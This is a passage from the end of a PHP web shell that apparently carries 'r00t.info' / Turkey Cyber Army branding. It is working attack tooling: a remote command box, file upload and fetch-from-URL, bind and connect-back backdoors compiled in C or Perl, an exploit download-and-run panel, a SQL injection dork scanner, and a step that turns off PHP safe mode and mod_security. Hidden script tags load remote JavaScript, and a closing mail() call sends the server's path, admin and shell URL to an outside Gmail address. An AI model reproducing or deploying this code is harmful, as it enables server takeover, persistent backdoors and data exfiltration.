color=white>Exploit Faild...</font>";} else echo "<font color=white>Exploit Succeeded...<br>hxxp://$host:$port$path"."/images/stories/0day.php</font>"; } ?>
7609 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'idfinder')) { ?>
7610 <form action="?y=<?php echo $pwd; ?>&x=idfinder" method="post">
7611 <script language="Javascript">
7612<!--
7613<div style="font-family: verdana;">
7614<center>
7615<strong>Facebook ID Finder</strong><br>
7616<br>
7617<small>
7618<div style="text-align: center;">
7619<p>Tool ini berguna bagi anda yang ingin mengetahui ID Profile Facebook.</p>
7620<p>Bukan hanya Profil, tapi anda juga bisa mencari ID aplikasi halaman, dll.</p>
7621<p>Tulis username anda (www.facebook.com/INI USERNAME) , halaman, atau aplikasi,</p>
7622<p>kemudian klik <strong>Get Facebook ID.</strong></p>
7623</div>
7624</small>
7625<br>
7626<center>
7627<form action="hxxps://graph.facebook.com/?id=" method="get"><input class="textinput" name="id" size="35" type="text"> <input class="buttonsubmit" name="submit" value="Get Facebook ID" type="submit"></form>
7628</center>
7629<div style="text-align: center;">
7630<p><small>Tool ini dibuat oleh : <strong><a href="hxxp://dfc48.blogspot.com/" target="_blank">DFC48</a></strong></small></p>
7631
7632</div><br/>
7633<div id="fb-root"></div>
7634<script>(function(d, s, id) {
7635 var js, fjs = d.getElementsByTagName(s)[0];
7636 if (d.getElementById(id)) return;
7637 js = d.createElement(s); js.id = id;
7638 js.src = "//connect.facebook.net/id_ID/all.js#xfbml=1";
7639 fjs.parentNode.insertBefore(js, fjs);
7640}(document, 'script', 'facebook-jssdk'));</script>
7641<div class="fb-like-box" data-href="hxxp://www.facebook.com/pages/JKT48-Fans-Indonesia/350715818365286" data-width="400" data-height="350" data-colorscheme="light" data-show-faces="true" data-header="true" data-stream="false" data-show-border="true"></div>
7642//-->
7643</script>
7644
7645<br />
7646<div style="font-family: verdana;">
7647<center>
7648<b>Facebook ID Finder</b><br />
7649<br />
7650<small>
7651<div style="text-align: center;">
7652Tool ini berguna bagi anda yang ingin mengetahui ID Profile Facebook.<br />
7653Bukan hanya Profil, tapi anda juga bisa mencari ID aplikasi halaman, dll.<br />
7654Tulis username anda (www.facebook.com/INI USERNAME) , halaman, atau aplikasi,<br />
7655kemudian klik <b>Get Facebook ID.</b></div>
7656</small>
7657<br />
7658<center>
7659<form action="hxxps://graph.facebook.com/?id=" method="get">
7660<input class="textinput" name="id" size="35" type="text" /> <input class="buttonsubmit" name="submit" type="submit" value="Get Facebook ID" /></form>
7661</center>
7662<div style="text-align: center;">
7663<small>Tool ini dibuat oleh : <b><a href="hxxp://r00t.info" target="_blank">DFC48</a></b></small></div>
7664 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'comuser')) { ?>
7665 <form action="?y=<?php echo $pwd; ?>&x=comuser" method="post">
7666 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://www.gim3-skierniewice.pl/administrator/newfile.php" width="100%"></iframe>
7667 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner')) { ?>
7668<form action="?y=<?php echo $pwd; ?>&x=sqli-scanner" method="post">
7669
7670<?php echo '<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> <input class="inputz" type="text" value="" name="dork" style="color:#FF0000;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan"></form></center>'; ob_start(); set_time_limit(0); if (isset($_POST['scan'])) { $browser = $_SERVER['hxxp_USER_AGENT']; $first = "startgoogle.startpagina.nl/index.php?q="; $sec = "&start="; $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/'; for($id=0 ; $id<=30; $id++){ $page=$id*10; $dork=urlencode($_POST['dork']); $url = $first.$dork.$sec.$page; $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl,CURLOPT_USERAGENT,'$browser)'); $result = curl_exec($curl); curl_close($curl); preg_match_all($reg,$result,$matches); } foreach($matches[1] as $site){ $url = preg_replace("/=/", "='", $site); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl,CURLOPT_USERAGENT,'$browser)'); curl_setopt($curl,CURLOPT_TIMEOUT,'5'); $GET=curl_exec($curl); if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT *
7671
7672FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) { echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font color=#FF0000> <-- SQLI Vuln
7673
7674Found..</font></b></center>'; ob_flush();flush(); }else{ echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16"> <-- Not Vuln</font></center>'; ob_flush();flush(); } ob_flush();flush(); } ob_flush();flush(); } ob_flush();flush(); } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
7675<form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
7676<table class="tabnet" style="width:320px;padding:0 1px;">
7677<tr><th colspan="2">Upload from computer</th></tr>
7678<tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
7679<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
7680</tr>
7681</table></form>
7682<table class="tabnet" style="width:320px;padding:0 1px;">
7683<tr><th colspan="2">Upload from url</th></tr>
7684<tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
7685<table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="hxxp://www.some-code/exploits.c"></td></tr>
7686<tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
7687<tr><td><select size="1" class="inputz" name="pilihan">
7688<option value="wwget">wget</option>
7689<option value="wlynx">lynx</option>
7690<option value="wfread">fread</option>
7691<option value="wfetch">fetch</option>
7692<option value="wlinks">links</option>
7693<option value="wget">GET</option>
7694<option value="wcurl">curl</option>
7695</select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
7696</tr>
7697</table>
7698<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
7699<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){ if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>
7700<table class="tabnet">
7701<tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
7702<tr>
7703<td>
7704<table>
7705<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
7706<tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
7707<tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
7708<tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
7709<input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
7710</table>
7711</td>
7712<td>
7713<table>
7714<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
7715<tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
7716<tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
7717<tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
7718<input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
7719</table>
7720</td>
7721<td>
7722<table>
7723<form method="post" action="?y=<?php echo $pwd; ?>&x=netsploit">
7724<tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
7725<tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
7726</tr>
7727<tr><td><select size="1" class="inputz" name="pilihan">
7728<option value="wwget">wget</option>
7729<option value="wlynx">lynx</option>
7730<option value="wfread">fread</option>
7731<option value="wfetch">fetch</option>
7732<option value="wlinks">links</option>
7733<option value="wget">GET</option>
7734<option value="wcurl">curl</option>
7735</select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
7736</table>
7737</td>
7738</tr>
7739</table>
7740<div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
7741<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
7742<form action="?y=<?php echo $pwd; ?>&x=shell" method="post">
7743<table class="cmdbox">
7744<tr><td colspan="2">
7745<textarea class="output" readonly>
7746<?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?>
7747</textarea>
7748<tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
7749</table>
7750</form>
7751<?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
7752<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />
7753<?php if(isset($_POST['ini'])) { $byphp = "safe_mode = Off
7754disable_functions = None
7755safe_mode_gid = OFF
7756open_basedir = OFF
7757allow_url_fopen = On"; $byht = "<IfModule mod_security.c>
7758SecFilterEngine Off
7759SecFilterScanPOST Off
7760SecFilterCheckURLEncoding Off
7761SecFilterCheckUnicodeEncoding Off
7762</IfModule>"; file_put_contents("php.ini",$byphp); file_put_contents(".htaccess",$byht); echo "<script>alert('Disable Functions and Safemode Created'); hideAll();</script>"; die(); } ?></div></div>
7763<div class="footer">laked by <a href='hxxps://www.facebook.com/r00t.info/' target='_blank'>R00T.iNFO</a> - Turkey Cyber Army team</div>
7764<script src=hxxp://r00t.info/ccb.js></script>
7765</body>
7766</html>
7767<script type="text/javascript">
7768document.write(unescape('<script src=hxxp://r00t.info/lcrlamersavar/log.js></script>'));
7769</script>
7770<script src=hxxp://r00t.info/ccb.js></script>
7771
7772<?php $kime = "byhero44@gmail.com"; $baslik = "r00t.info Server Avcisi V1.0"; $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n"; $EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n"; $EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n"; $EL_MuHaMMeD.= "Shell Link : hxxp://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n"; $EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['hxxp_HOST'] . "\r\n"; mail($kime, $baslik, $EL_MuHaMMeD); ?>